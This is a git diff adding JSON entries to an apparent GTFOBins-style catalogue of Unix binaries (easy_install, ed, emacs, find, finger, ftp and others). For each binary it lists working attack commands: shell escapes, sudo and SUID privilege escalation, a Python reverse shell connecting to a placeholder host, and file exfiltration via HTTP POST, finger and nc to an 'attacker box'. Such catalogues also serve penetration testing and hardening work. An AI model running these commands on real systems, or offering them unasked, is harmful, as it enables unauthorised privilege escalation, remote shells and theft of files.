diff --git a/data/easy_install.json b/data/easy_install.json new file mode 100644 index 0000000..2425db3 --- /dev/null +++ b/data/easy_install.json @@ -0,0 +1,53 @@ +{ + "functions": { + "shell": [ + { + "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\neasy_install $TF\n" + } + ], + "reverse-shell": [ + { + "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.", + "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\neasy_install $TF\n" + } + ], + "file-upload": [ + { + "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. The file path must be absolute.", + "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\neasy_install $TF\n" + }, + { + "description": "Serve files in the local folder running an HTTP server. ", + "code": "TF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\neasy_install $TF\n" + } + ], + "file-download": [ + { + "description": "Fetch a remote file via HTTP GET request. The file path must be absolute.", + "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('[url]', '[file]')\\\"\\\"\\\")\" > $TF/setup.py\npip install $TF\n" + } + ], + "file-write": [ + { + "description": "The file path must be absolute.", + "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"[file]\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/setup.py\neasy_install $TF\n" + } + ], + "file-read": [ + { + "description": "The read file content is wrapped within program messages. The file path must be absolute.", + "code": "TF=$(mktemp -d)\necho 'print(open(\"[file]\").read())' > $TF/setup.py\neasy_install $TF\n" + } + ], + "library-load": [ + { + "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\neasy_install $TF\n" + } + ], + "sudo": [ + { + "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n" + } + ] + } +} \ No newline at end of file diff --git a/data/ed.json b/data/ed.json new file mode 100644 index 0000000..6bb58a6 --- /dev/null +++ b/data/ed.json @@ -0,0 +1,29 @@ +{ + "functions": { + "shell": [ + { + "code": "ed\n!/bin/sh\n" + } + ], + "file-write": [ + { + "code": "ed [file]\na\nDATA\n.\nw\nq\n" + } + ], + "file-read": [ + { + "code": "ed [file]\n,p\nq\n" + } + ], + "sudo": [ + { + "code": "sudo ed\n!/bin/sh\n" + } + ], + "limited-suid": [ + { + "code": "./ed\n!/bin/sh\n" + } + ] + } +} \ No newline at end of file diff --git a/data/emacs.json b/data/emacs.json new file mode 100644 index 0000000..bba8a93 --- /dev/null +++ b/data/emacs.json @@ -0,0 +1,29 @@ +{ + "functions": { + "shell": [ + { + "code": "emacs -Q -nw --eval '(term \"/bin/sh\")'" + } + ], + "file-write": [ + { + "code": "emacs [file]\nDATA\nC-x C-s\n" + } + ], + "file-read": [ + { + "code": "emacs [file]" + } + ], + "suid": [ + { + "code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'" + } + ], + "sudo": [ + { + "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'" + } + ] + } +} \ No newline at end of file diff --git a/data/env.json b/data/env.json new file mode 100644 index 0000000..8aff973 --- /dev/null +++ b/data/env.json @@ -0,0 +1,19 @@ +{ + "functions": { + "shell": [ + { + "code": "env /bin/sh" + } + ], + "suid": [ + { + "code": "./env /bin/sh -p" + } + ], + "sudo": [ + { + "code": "sudo env /bin/sh" + } + ] + } +} \ No newline at end of file diff --git a/data/expand.json b/data/expand.json new file mode 100644 index 0000000..8289eab --- /dev/null +++ b/data/expand.json @@ -0,0 +1,20 @@ +{ + "description": "The read file content is corrupted by replacing tabs with spaces.", + "functions": { + "file-read": [ + { + "code": "expand \"[file]\"\n" + } + ], + "suid": [ + { + "code": "./expand \"[file]\"\n" + } + ], + "sudo": [ + { + "code": "sudo expand \"[file]\"\n" + } + ] + } +} \ No newline at end of file diff --git a/data/expect.json b/data/expect.json new file mode 100644 index 0000000..aba4e49 --- /dev/null +++ b/data/expect.json @@ -0,0 +1,19 @@ +{ + "functions": { + "shell": [ + { + "code": "expect -c 'spawn /bin/sh;interact'" + } + ], + "suid": [ + { + "code": "./expect -c 'spawn /bin/sh -p;interact'" + } + ], + "sudo": [ + { + "code": "sudo expect -c 'spawn /bin/sh;interact'" + } + ] + } +} \ No newline at end of file diff --git a/data/facter.json b/data/facter.json new file mode 100644 index 0000000..21860d2 --- /dev/null +++ b/data/facter.json @@ -0,0 +1,14 @@ +{ + "functions": { + "shell": [ + { + "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF facter\n" + } + ], + "sudo": [ + { + "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF sudo -E facter\n" + } + ] + } +} \ No newline at end of file diff --git a/data/file.json b/data/file.json new file mode 100644 index 0000000..e8b93c9 --- /dev/null +++ b/data/file.json @@ -0,0 +1,20 @@ +{ + "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. If a line in the target file begins with a '#' it will not be printed as these lines are parsed as comments. It can also be provided with a directory and will read each file in the directory.", + "functions": { + "file-read": [ + { + "code": "file -m [file]\n" + } + ], + "suid": [ + { + "code": "./file -m [file]\n" + } + ], + "sudo": [ + { + "code": "sudo file -m [file]\n" + } + ] + } +} \ No newline at end of file diff --git a/data/find.json b/data/find.json new file mode 100644 index 0000000..83cf110 --- /dev/null +++ b/data/find.json @@ -0,0 +1,19 @@ +{ + "functions": { + "shell": [ + { + "code": "find . -exec /bin/sh \\; -quit" + } + ], + "suid": [ + { + "code": "./find . -exec /bin/sh -p \\; -quit" + } + ], + "sudo": [ + { + "code": "sudo find . -exec /bin/sh \\; -quit" + } + ] + } +} \ No newline at end of file diff --git a/data/finger.json b/data/finger.json new file mode 100644 index 0000000..8eb06f9 --- /dev/null +++ b/data/finger.json @@ -0,0 +1,17 @@ +{ + "description": "'finger' hangs waiting for the remote peer to close the socket.", + "functions": { + "file-upload": [ + { + "description": "Send a binary file to a TCP port. Run 'sudo nc -l -p 79 | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.", + "code": "finger \"$(base64 [file])@[host]\"\n" + } + ], + "file-download": [ + { + "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | sudo nc -l -p 79' on the attacker box to send the file.", + "code": "finger x@[host] | base64 -d > [file]\n" + } + ] + } +} \ No newline at end of file diff --git a/data/flock.json b/data/flock.json new file mode 100644 index 0000000..fe86de7 --- /dev/null +++ b/data/flock.json @@ -0,0 +1,19 @@ +{ + "functions": { + "shell": [ + { + "code": "flock -u / /bin/sh" + } + ], + "suid": [ + { + "code": "./flock -u / /bin/sh -p" + } + ], + "sudo": [ + { + "code": "sudo flock -u / /bin/sh" + } + ] + } +} \ No newline at end of file diff --git a/data/fmt.json b/data/fmt.json new file mode 100644 index 0000000..8f5d266 --- /dev/null +++ b/data/fmt.json @@ -0,0 +1,20 @@ +{ + "description": "The read file content is not binary-safe.", + "functions": { + "file-read": [ + { + "code": "fmt -p NON_EXISTING_PREFIX [file]\n" + } + ], + "suid": [ + { + "code": "./fmt -p NON_EXISTING_PREFIX [file]\n" + } + ], + "sudo": [ + { + "code": "sudo fmt -p NON_EXISTING_PREFIX [file]\n" + } + ] + } +} \ No newline at end of file diff --git a/data/fold.json b/data/fold.json new file mode 100644 index 0000000..22caeb8 --- /dev/null +++ b/data/fold.json @@ -0,0 +1,19 @@ +{ + "functions": { + "file-read": [ + { + "code": "fold -w99999999 [file]\n" + } + ], + "suid": [ + { + "code": "./fold -w99999999 [file]\n" + } + ], + "sudo": [ + { + "code": "sudo fold -w99999999 [file]\n" + } + ] + } +} \ No newline at end of file diff --git a/data/ftp.json b/data/ftp.json new file mode 100644 index 0000000..2800705 --- /dev/null +++ b/data/ftp.json @@ -0,0 +1,26 @@ +{ + "functions": { + "shell": [ + { + "code": "ftp\n!/bin/sh\n" + } + ], + "file-upload": [ + { + "description": "Send local file to a FTP server.", + "code": "ftp [host]\nput [file]\n" + } + ], + "file-download": [ + { + "description": "Fetch a remote file from a FTP server.", + "code": "ftp [host]\nget [file]\n" + } + ], + "sudo": [ + { + "code": "sudo ftp\n!/bin/sh\n" + } + ] + } +} \ No newline at end of file